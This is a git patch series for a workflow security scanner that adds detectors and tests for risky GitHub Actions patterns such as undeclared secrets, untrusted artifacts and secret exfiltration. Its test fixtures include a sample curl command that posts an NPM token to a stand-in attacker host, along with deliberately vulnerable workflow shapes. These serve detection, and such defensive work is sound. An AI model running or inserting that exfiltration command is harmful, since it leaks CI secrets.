a/src/layer2-static/detectors/workflow-call-boundary.ts b/src/layer2-static/detectors/workflow-call-boundary.ts new file mode 100644 index 0000000..84b0f2c --- /dev/null +++ b/src/layer2-static/detectors/workflow-call-boundary.ts @@ -0,0 +1,112 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { extractWorkflowCallBoundaryContext } from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowCallBoundaryInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function collectExpressionKeys(textContent: string, prefix: "inputs" | "secrets"): Set { + const keys = new Set(); + const pattern = new RegExp(`${prefix}\\.([a-zA-Z0-9_-]+)`, "giu"); + + for (const match of textContent.matchAll(pattern)) { + const key = match[1]?.trim(); + if (!key) { + continue; + } + keys.add(key); + } + + return keys; +} + +export function detectWorkflowCallBoundary(input: WorkflowCallBoundaryInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const boundary = extractWorkflowCallBoundaryContext(input.parsed, facts); + if (!boundary.hasWorkflowCall) { + return []; + } + + const declaredInputs = new Set(boundary.declaredInputKeys); + const declaredSecrets = new Set(boundary.declaredSecretKeys); + const referencedInputs = collectExpressionKeys(input.textContent, "inputs"); + const referencedSecrets = collectExpressionKeys(input.textContent, "secrets"); + + const undeclaredInputs = Array.from(referencedInputs).filter((key) => !declaredInputs.has(key)); + const undeclaredSecrets = Array.from(referencedSecrets).filter( + (key) => !declaredSecrets.has(key), + ); + + const findings: Finding[] = []; + for (const inputKey of undeclaredInputs) { + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [`inputs.${inputKey}`, "workflow_call"], + fallbackValue: `workflow_call references undeclared input ${inputKey}`, + }); + findings.push({ + rule_id: "workflow-call-boundary", + finding_id: `WORKFLOW_CALL_BOUNDARY-INPUT-${input.filePath}-${inputKey}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: "on.workflow_call.inputs" }, + description: `workflow_call references undeclared input '${inputKey}'`, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-20", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + `Declare input '${inputKey}' under on.workflow_call.inputs with explicit type and required policy`, + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + for (const secretKey of undeclaredSecrets) { + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [`secrets.${secretKey}`, "workflow_call"], + fallbackValue: `workflow_call references undeclared secret ${secretKey}`, + }); + findings.push({ + rule_id: "workflow-call-boundary", + finding_id: `WORKFLOW_CALL_BOUNDARY-SECRET-${input.filePath}-${secretKey}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: "on.workflow_call.secrets" }, + description: `workflow_call references undeclared secret '${secretKey}'`, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-862", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + `Declare secret '${secretKey}' under on.workflow_call.secrets and pass only required values from callers`, + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/engine.ts b/src/layer2-static/engine.ts index 3cf6455..78a8163 100644 --- a/src/layer2-static/engine.ts +++ b/src/layer2-static/engine.ts @@ -42,6 +42,8 @@ import { detectWorkflowHardcodedContainerCredentials } from "./detectors/workflo import { detectWorkflowUnredactedSecrets } from "./detectors/workflow-unredacted-secrets.js"; import { detectWorkflowBotConditions } from "./detectors/workflow-bot-conditions.js"; import { detectWorkflowPrTargetCheckoutHead } from "./detectors/workflow-pr-target-checkout-head.js"; +import { detectWorkflowArtifactTrustChain } from "./detectors/workflow-artifact-trust-chain.js"; +import { detectWorkflowCallBoundary } from "./detectors/workflow-call-boundary.js"; import { filterRegisteredAudits, type RegisteredAudit } from "./audits/registry.js"; import type { AuditPersona, RuntimeMode } from "../config.js"; import { FINDING_CATEGORIES, type Finding } from "../types/finding.js"; @@ -659,6 +661,28 @@ function buildFileAudits(): Array> { }) : [], }, + { + id: "workflow-artifact-trust-chain", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowArtifactTrustChain({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-call-boundary", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowCallBoundary({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, { id: "hardcoded-container-credentials", run: ({ file, input }) => diff --git a/tests/layer2/workflow-artifact-trust-chain.test.ts b/tests/layer2/workflow-artifact-trust-chain.test.ts new file mode 100644 index 0000000..c04baab --- /dev/null +++ b/tests/layer2/workflow-artifact-trust-chain.test.ts @@ -0,0 +1,117 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowArtifactTrustChain } from "../../src/layer2-static/detectors/workflow-artifact-trust-chain"; + +describe("workflow artifact trust chain detector", () => { + it("flags untrusted artifact producer consumed by privileged job that executes commands", () => { + const findings = detectWorkflowArtifactTrustChain({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + build: + steps: + - uses: actions/upload-artifact@v4 + with: + name: dist + release: + needs: build + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: dist + - run: ./dist/release.sh +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/upload-artifact@v4", + with: { + name: "dist", + }, + }, + ], + }, + release: { + needs: "build", + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/download-artifact@v4", + with: { + name: "dist", + }, + }, + { + run: "./dist/release.sh", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-artifact-trust-chain"); + }); + + it("does not flag artifact transfers on trusted triggers", () => { + const findings = detectWorkflowArtifactTrustChain({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push] +jobs: + build: + steps: + - uses: actions/upload-artifact@v4 + with: + name: dist + release: + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: dist + - run: ./dist/release.sh +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/upload-artifact@v4", + with: { + name: "dist", + }, + }, + ], + }, + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/download-artifact@v4", + with: { + name: "dist", + }, + }, + { + run: "./dist/release.sh", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-call-boundary.test.ts b/tests/layer2/workflow-call-boundary.test.ts new file mode 100644 index 0000000..4eb1e65 --- /dev/null +++ b/tests/layer2/workflow-call-boundary.test.ts @@ -0,0 +1,133 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowCallBoundary } from "../../src/layer2-static/detectors/workflow-call-boundary"; + +describe("workflow call boundary detector", () => { + it("flags undeclared workflow_call secrets referenced by jobs", () => { + const findings = detectWorkflowCallBoundary({ + filePath: ".github/workflows/reusable.yml", + textContent: `on: + workflow_call: + inputs: + config_path: + required: true + type: string +jobs: + run: + steps: + - run: echo \${{ secrets.publish_token }} +`, + parsed: { + on: { + workflow_call: { + inputs: { + config_path: { + required: true, + type: "string", + }, + }, + }, + }, + jobs: { + run: { + steps: [ + { + run: "echo ${{ secrets.publish_token }}", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-call-boundary"); + expect(findings[0]?.description).toContain("secret"); + }); + + it("flags undeclared workflow_call inputs referenced by jobs", () => { + const findings = detectWorkflowCallBoundary({ + filePath: ".github/workflows/reusable.yml", + textContent: `on: + workflow_call: + secrets: + publish_token: + required: true +jobs: + run: + steps: + - run: echo \${{ inputs.channel }} +`, + parsed: { + on: { + workflow_call: { + secrets: { + publish_token: { + required: true, + }, + }, + }, + }, + jobs: { + run: { + steps: [ + { + run: "echo ${{ inputs.channel }}", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.description).toContain("input"); + }); + + it("does not flag when workflow_call references are explicitly declared", () => { + const findings = detectWorkflowCallBoundary({ + filePath: ".github/workflows/reusable.yml", + textContent: `on: + workflow_call: + inputs: + channel: + required: true + type: string + secrets: + publish_token: + required: true +jobs: + run: + steps: + - run: echo \${{ inputs.channel }} \${{ secrets.publish_token }} +`, + parsed: { + on: { + workflow_call: { + inputs: { + channel: { + required: true, + type: "string", + }, + }, + secrets: { + publish_token: { + required: true, + }, + }, + }, + }, + jobs: { + run: { + steps: [ + { + run: "echo ${{ inputs.channel }} ${{ secrets.publish_token }}", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-wave-f-engine.test.ts b/tests/layer2/workflow-wave-f-engine.test.ts index df58253..3215127 100644 --- a/tests/layer2/workflow-wave-f-engine.test.ts +++ b/tests/layer2/workflow-wave-f-engine.test.ts @@ -61,4 +61,106 @@ jobs: const ruleIds = new Set(findings.map((finding) => finding.rule_id)); expect(ruleIds.has("workflow-pr-target-checkout-head")).toBe(true); }); + + it("surfaces artifact trust-chain and workflow-call-boundary findings through runStaticEngine", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: `on: [pull_request] +jobs: + build: + steps: + - uses: actions/upload-artifact@v4 + with: + name: dist + release: + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: dist + - run: ./dist/release.sh +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/upload-artifact@v4", + with: { + name: "dist", + }, + }, + ], + }, + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/download-artifact@v4", + with: { + name: "dist", + }, + }, + { + run: "./dist/release.sh", + }, + ], + }, + }, + }, + }, + { + filePath: ".github/workflows/reusable.yml", + format: "yaml", + textContent: `on: + workflow_call: + inputs: + config_path: + required: true + type: string +jobs: + run: + steps: + - run: echo \${{ secrets.publish_token }} +`, + parsed: { + on: { + workflow_call: { + inputs: { + config_path: { + required: true, + type: "string", + }, + }, + }, + }, + jobs: { + run: { + steps: [ + { + run: "echo ${{ secrets.publish_token }}", + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + expect(ruleIds.has("workflow-artifact-trust-chain")).toBe(true); + expect(ruleIds.has("workflow-call-boundary")).toBe(true); + }); }); diff --git a/tests/meta/workflow-audit-parity-contract.test.ts b/tests/meta/workflow-audit-parity-contract.test.ts index 2ff2e43..3f004a2 100644 --- a/tests/meta/workflow-audit-parity-contract.test.ts +++ b/tests/meta/workflow-audit-parity-contract.test.ts @@ -40,6 +40,8 @@ const expectedCheckedAuditIds = [ "hardcoded-container-credentials", "unredacted-secrets", "bot-conditions", + "workflow-call-boundary", + "workflow-artifact-trust-chain", "workflow-pr-target-checkout-head", ] as const; From 25bf6f8aeb0807d8c21449e9c4b7de91ec62650f Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 13:56:04 +0000 Subject: [PATCH 3/6] feat(workflow): add secret exfiltration workflow audit --- docs/workflow-audit-parity-checklist.md | 2 +- .../detectors/workflow-secret-exfiltration.ts | 121 ++++++++++++++++++ src/layer2-static/engine.ts | 13 ++ .../workflow-secret-exfiltration.test.ts | 84 ++++++++++++ tests/layer2/workflow-wave-f-engine.test.ts | 35 +++++ .../workflow-audit-parity-contract.test.ts | 1 + 6 files changed, 255 insertions(+), 1 deletion(-) create mode 100644 src/layer2-static/detectors/workflow-secret-exfiltration.ts create mode 100644 tests/layer2/workflow-secret-exfiltration.test.ts diff --git a/docs/workflow-audit-parity-checklist.md b/docs/workflow-audit-parity-checklist.md index 94d3d19..6dcfef4 100644 --- a/docs/workflow-audit-parity-checklist.md +++ b/docs/workflow-audit-parity-checklist.md @@ -59,7 +59,7 @@ Use this checklist to track the workflow-audit detectors implemented in CodeGate - [ ] `workflow-oidc-untrusted-context` - [x] `workflow-pr-target-checkout-head` - [ ] `workflow-dynamic-matrix-injection` -- [ ] `workflow-secret-exfiltration` +- [x] `workflow-secret-exfiltration` - [ ] `dependabot-auto-merge` - [ ] `workflow-local-action-mutation` diff --git a/src/layer2-static/detectors/workflow-secret-exfiltration.ts b/src/layer2-static/detectors/workflow-secret-exfiltration.ts new file mode 100644 index 0000000..f77d0af --- /dev/null +++ b/src/layer2-static/detectors/workflow-secret-exfiltration.ts @@ -0,0 +1,121 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowSecretExfiltrationInput { + filePath: string; + parsed: unknown; + textContent: string; + trustedApiDomains: string[]; +} + +const OUTBOUND_COMMAND_PATTERN = /\b(curl|wget|invoke-webrequest|httpie)\b/iu; +const SECRET_REFERENCE_PATTERN = /\$\{\{\s*secrets\.([a-zA-Z0-9_]+)\s*\}\}/giu; +const URL_PATTERN = /https?:\/\/[^\s"')]+/giu; + +function extractSecretReferences(value: string): string[] { + const references = new Set(); + for (const match of value.matchAll(SECRET_REFERENCE_PATTERN)) { + const key = match[1]?.trim(); + if (!key) { + continue; + } + references.add(key); + } + return Array.from(references); +} + +function extractUrls(value: string): string[] { + return Array.from(value.matchAll(URL_PATTERN), (match) => match[0] ?? "").filter(Boolean); +} + +function isTrustedHost(hostname: string, trustedApiDomains: string[]): boolean { + const normalizedHost = hostname.toLowerCase(); + return trustedApiDomains.some((domain) => { + const normalizedDomain = domain.toLowerCase(); + return normalizedHost === normalizedDomain || normalizedHost.endsWith(`.${normalizedDomain}`); + }); +} + +function hasOnlyTrustedUrls(run: string, trustedApiDomains: string[]): boolean { + const urls = extractUrls(run); + if (urls.length === 0) { + return false; + } + + return urls.every((url) => { + try { + const parsed = new URL(url); + return isTrustedHost(parsed.hostname, trustedApiDomains); + } catch { + return false; + } + }); +} + +export function detectWorkflowSecretExfiltration( + input: WorkflowSecretExfiltrationInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + if (!step.run || !OUTBOUND_COMMAND_PATTERN.test(step.run)) { + return; + } + + const referencedSecrets = extractSecretReferences(step.run); + if (referencedSecrets.length === 0) { + return; + } + + if (hasOnlyTrustedUrls(step.run, input.trustedApiDomains)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["secrets.", "curl", "wget", "http://", "https://"], + fallbackValue: `${job.id} step references secrets in outbound network command`, + }); + + findings.push({ + rule_id: "workflow-secret-exfiltration", + finding_id: `WORKFLOW_SECRET_EXFILTRATION-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "CRITICAL", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: "Workflow step sends secret context through outbound network command", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-200", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid sending secrets through outbound shell commands", + "Use trusted first-party actions with scoped credentials instead of ad-hoc exfil-prone scripts", + "Restrict outbound domains and sanitize command arguments in privileged workflows", + ], + metadata: { + referenced_secrets: referencedSecrets, + }, + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/engine.ts b/src/layer2-static/engine.ts index 78a8163..44de10a 100644 --- a/src/layer2-static/engine.ts +++ b/src/layer2-static/engine.ts @@ -44,6 +44,7 @@ import { detectWorkflowBotConditions } from "./detectors/workflow-bot-conditions import { detectWorkflowPrTargetCheckoutHead } from "./detectors/workflow-pr-target-checkout-head.js"; import { detectWorkflowArtifactTrustChain } from "./detectors/workflow-artifact-trust-chain.js"; import { detectWorkflowCallBoundary } from "./detectors/workflow-call-boundary.js"; +import { detectWorkflowSecretExfiltration } from "./detectors/workflow-secret-exfiltration.js"; import { filterRegisteredAudits, type RegisteredAudit } from "./audits/registry.js"; import type { AuditPersona, RuntimeMode } from "../config.js"; import { FINDING_CATEGORIES, type Finding } from "../types/finding.js"; @@ -683,6 +684,18 @@ function buildFileAudits(): Array> { }) : [], }, + { + id: "workflow-secret-exfiltration", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowSecretExfiltration({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + trustedApiDomains: input.config.trustedApiDomains, + }) + : [], + }, { id: "hardcoded-container-credentials", run: ({ file, input }) => diff --git a/tests/layer2/workflow-secret-exfiltration.test.ts b/tests/layer2/workflow-secret-exfiltration.test.ts new file mode 100644 index 0000000..efd3513 --- /dev/null +++ b/tests/layer2/workflow-secret-exfiltration.test.ts @@ -0,0 +1,84 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowSecretExfiltration } from "../../src/layer2-static/detectors/workflow-secret-exfiltration"; + +describe("workflow secret exfiltration detector", () => { + it("flags outbound network commands that include secrets context", () => { + const findings = detectWorkflowSecretExfiltration({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + release: + steps: + - run: curl -fsSL https://evil.example/exfil --data "token=\${{ secrets.NPM_TOKEN }}"\n`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + steps: [ + { + run: 'curl -fsSL https://evil.example/exfil --data "token=${{ secrets.NPM_TOKEN }}"', + }, + ], + }, + }, + }, + trustedApiDomains: [], + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-secret-exfiltration"); + expect(findings[0]?.severity).toBe("CRITICAL"); + }); + + it("does not flag trusted domains", () => { + const findings = detectWorkflowSecretExfiltration({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + release: + steps: + - run: curl -fsSL https://api.github.com/upload --data "token=\${{ secrets.GITHUB_TOKEN }}"\n`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + steps: [ + { + run: 'curl -fsSL https://api.github.com/upload --data "token=${{ secrets.GITHUB_TOKEN }}"', + }, + ], + }, + }, + }, + trustedApiDomains: ["api.github.com"], + }); + + expect(findings).toHaveLength(0); + }); + + it("does not flag commands without secrets context", () => { + const findings = detectWorkflowSecretExfiltration({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + release: + steps: + - run: curl -fsSL https://example.com/health\n`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + steps: [ + { + run: "curl -fsSL https://example.com/health", + }, + ], + }, + }, + }, + trustedApiDomains: [], + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-wave-f-engine.test.ts b/tests/layer2/workflow-wave-f-engine.test.ts index 3215127..5951a59 100644 --- a/tests/layer2/workflow-wave-f-engine.test.ts +++ b/tests/layer2/workflow-wave-f-engine.test.ts @@ -163,4 +163,39 @@ jobs: expect(ruleIds.has("workflow-artifact-trust-chain")).toBe(true); expect(ruleIds.has("workflow-call-boundary")).toBe(true); }); + + it("surfaces workflow-secret-exfiltration findings through runStaticEngine", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: `on: [pull_request] +jobs: + release: + steps: + - run: curl -fsSL https://evil.example/exfil --data "token=\${{ secrets.NPM_TOKEN }}"\n`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + steps: [ + { + run: 'curl -fsSL https://evil.example/exfil --data "token=${{ secrets.NPM_TOKEN }}"', + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + expect(ruleIds.has("workflow-secret-exfiltration")).toBe(true); + }); }); diff --git a/tests/meta/workflow-audit-parity-contract.test.ts b/tests/meta/workflow-audit-parity-contract.test.ts index 3f004a2..76488ca 100644 --- a/tests/meta/workflow-audit-parity-contract.test.ts +++ b/tests/meta/workflow-audit-parity-contract.test.ts @@ -43,6 +43,7 @@ const expectedCheckedAuditIds = [ "workflow-call-boundary", "workflow-artifact-trust-chain", "workflow-pr-target-checkout-head", + "workflow-secret-exfiltration", ] as const; function readChecklist(): string { From 7e5775e4e048a689c3102380809cd3f486fc8dbe Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 14:07:41 +0000 Subject: [PATCH 4/6] feat(workflow): complete wave-f detector set --- docs/workflow-audit-parity-checklist.md | 11 +- .../detectors/dependabot-auto-merge.ts | 146 ++++++++++++ .../workflow-dynamic-matrix-injection.ts | 185 ++++++++++++++++ .../workflow-local-action-mutation.ts | 158 +++++++++++++ .../workflow-oidc-untrusted-context.ts | 207 ++++++++++++++++++ src/layer2-static/engine.ts | 48 ++++ tests/layer2/dependabot-auto-merge.test.ts | 62 ++++++ .../workflow-dynamic-matrix-injection.test.ts | 70 ++++++ .../workflow-local-action-mutation.test.ts | 68 ++++++ .../workflow-oidc-untrusted-context.test.ts | 88 ++++++++ tests/layer2/workflow-wave-f-engine.test.ts | 129 +++++++++++ .../workflow-audit-parity-contract.test.ts | 4 + 12 files changed, 1170 insertions(+), 6 deletions(-) create mode 100644 src/layer2-static/detectors/dependabot-auto-merge.ts create mode 100644 src/layer2-static/detectors/workflow-dynamic-matrix-injection.ts create mode 100644 src/layer2-static/detectors/workflow-local-action-mutation.ts create mode 100644 src/layer2-static/detectors/workflow-oidc-untrusted-context.ts create mode 100644 tests/layer2/dependabot-auto-merge.test.ts create mode 100644 tests/layer2/workflow-dynamic-matrix-injection.test.ts create mode 100644 tests/layer2/workflow-local-action-mutation.test.ts create mode 100644 tests/layer2/workflow-oidc-untrusted-context.test.ts diff --git a/docs/workflow-audit-parity-checklist.md b/docs/workflow-audit-parity-checklist.md index 6dcfef4..53babc4 100644 --- a/docs/workflow-audit-parity-checklist.md +++ b/docs/workflow-audit-parity-checklist.md @@ -51,17 +51,16 @@ Use this checklist to track the workflow-audit detectors implemented in CodeGate - [x] `unredacted-secrets` - [x] `bot-conditions` -## Wave F (Planned) +## Wave F -- [ ] `workflow-call-boundary` - [x] `workflow-call-boundary` - [x] `workflow-artifact-trust-chain` -- [ ] `workflow-oidc-untrusted-context` +- [x] `workflow-oidc-untrusted-context` - [x] `workflow-pr-target-checkout-head` -- [ ] `workflow-dynamic-matrix-injection` +- [x] `workflow-dynamic-matrix-injection` - [x] `workflow-secret-exfiltration` -- [ ] `dependabot-auto-merge` -- [ ] `workflow-local-action-mutation` +- [x] `dependabot-auto-merge` +- [x] `workflow-local-action-mutation` ## Notes diff --git a/src/layer2-static/detectors/dependabot-auto-merge.ts b/src/layer2-static/detectors/dependabot-auto-merge.ts new file mode 100644 index 0000000..44e1670 --- /dev/null +++ b/src/layer2-static/detectors/dependabot-auto-merge.ts @@ -0,0 +1,146 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface DependabotAutoMergeInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const MERGE_COMMAND_PATTERN = + /\b(gh\s+pr\s+merge|gh\s+pr\s+review|gh\s+api\s+[^#\n]*\/pulls\/[^#\n]*\/merge)\b/iu; + +const MERGE_ACTIONS = new Set([ + "ahmadnassri/action-dependabot-auto-merge", + "hmarr/auto-approve-action", + "fastify/github-action-merge-dependabot", + "ad-m/github-push-action", + "peter-evans/create-pull-request", +]); + +function normalizeUses(value: string | undefined): string | null { + if (!value) { + return null; + } + const normalized = value.trim().toLowerCase(); + if (normalized.length === 0) { + return null; + } + const atIndex = normalized.indexOf("@"); + return atIndex === -1 ? normalized : normalized.slice(0, atIndex); +} + +function hasDependabotActorConstraint(condition: string | undefined): boolean { + if (!condition) { + return false; + } + const normalized = condition.toLowerCase(); + return ( + normalized.includes("dependabot[bot]") || + normalized.includes("dependabot-preview[bot]") || + normalized.includes("github.actor") || + normalized.includes("github.triggering_actor") + ); +} + +function hasStrictRepoBoundary(condition: string | undefined): boolean { + if (!condition) { + return false; + } + const normalized = condition.toLowerCase(); + return ( + normalized.includes("github.repository == github.event.pull_request.head.repo.full_name") || + normalized.includes("github.event.pull_request.head.repo.fork == false") || + normalized.includes("github.event.pull_request.user.login") || + normalized.includes("github.ref == 'refs/heads/main'") || + normalized.includes("github.base_ref == 'main'") + ); +} + +function isRiskyTrigger(trigger: string): boolean { + const normalized = trigger.trim().toLowerCase(); + return normalized === "pull_request_target" || normalized === "workflow_run"; +} + +export function detectDependabotAutoMerge(input: DependabotAutoMergeInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const riskyTrigger = facts.triggers.find((trigger) => isRiskyTrigger(trigger)); + if (!riskyTrigger) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const mergesByCommand = Boolean(step.run && MERGE_COMMAND_PATTERN.test(step.run)); + const mergesByAction = (() => { + const normalizedUses = normalizeUses(step.uses); + return normalizedUses ? MERGE_ACTIONS.has(normalizedUses) : false; + })(); + if (!mergesByCommand && !mergesByAction) { + return; + } + + const mergedCondition = step.if ?? job.if; + if (!hasDependabotActorConstraint(mergedCondition)) { + return; + } + if (hasStrictRepoBoundary(mergedCondition)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ + "pull_request_target", + "dependabot[bot]", + "gh pr merge", + step.uses ?? "", + step.run ?? "", + ], + fallbackValue: `${job.id} auto-merge flow uses weak bot-only gating`, + }); + + findings.push({ + rule_id: "dependabot-auto-merge", + finding_id: `DEPENDABOT_AUTO_MERGE-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: riskyTrigger === "pull_request_target" ? "HIGH" : "MEDIUM", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { + field: step.run + ? `jobs.${job.id}.steps[${stepIndex}].run` + : `jobs.${job.id}.steps[${stepIndex}].uses`, + }, + description: + "Dependabot auto-merge flow relies on weak actor-only conditions in a privileged trigger context", + affected_tools: ["github-actions", "dependabot"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-285", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Require strict repository boundary checks before executing auto-merge operations", + "Avoid pull_request_target auto-merge flows unless actor, repo, and branch checks are explicit", + "Prefer dedicated Dependabot metadata and permission-check actions before merge approval", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-dynamic-matrix-injection.ts b/src/layer2-static/detectors/workflow-dynamic-matrix-injection.ts new file mode 100644 index 0000000..80739fd --- /dev/null +++ b/src/layer2-static/detectors/workflow-dynamic-matrix-injection.ts @@ -0,0 +1,185 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { collectUntrustedReachableJobIds } from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowDynamicMatrixInjectionInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const MATRIX_REFERENCE_PATTERN = /\$\{\{\s*matrix\.[^}]+\}\}/iu; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function asString(value: unknown): string | undefined { + return typeof value === "string" ? value : undefined; +} + +function isUntrustedDynamicMatrixExpression(value: string): boolean { + const normalized = value.toLowerCase(); + if (!normalized.includes("${{")) { + return false; + } + + const untrustedEventRefs = [ + "github.event.pull_request.", + "github.event.issue.", + "github.event.comment.", + "github.event.review.", + "github.event.discussion.", + "github.event.head_commit.", + ]; + + return untrustedEventRefs.some((ref) => normalized.includes(ref)); +} + +function isStaticFromJsonExpression(value: string): boolean { + const normalized = value.toLowerCase().replace(/\s+/gu, ""); + return ( + normalized.includes("fromjson('") || + normalized.includes('fromjson("') || + normalized.includes("fromjson(`") + ); +} + +function hasMatrixAllowListValidation(condition: string | undefined): boolean { + if (!condition) { + return false; + } + const normalized = condition.toLowerCase(); + return normalized.includes("contains(fromjson(") && normalized.includes("matrix."); +} + +export function detectWorkflowDynamicMatrixInjection( + input: WorkflowDynamicMatrixInjectionInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const root = asRecord(input.parsed); + const jobsRecord = root ? asRecord(root.jobs) : null; + if (!jobsRecord) { + return []; + } + + const reachableJobIds = collectUntrustedReachableJobIds(facts); + if (reachableJobIds.size === 0) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + if (!reachableJobIds.has(job.id)) { + return; + } + + const rawJob = asRecord(jobsRecord[job.id]); + if (!rawJob) { + return; + } + const strategyRecord = asRecord(rawJob.strategy); + const matrixExpression = strategyRecord ? asString(strategyRecord.matrix) : undefined; + if (!matrixExpression || 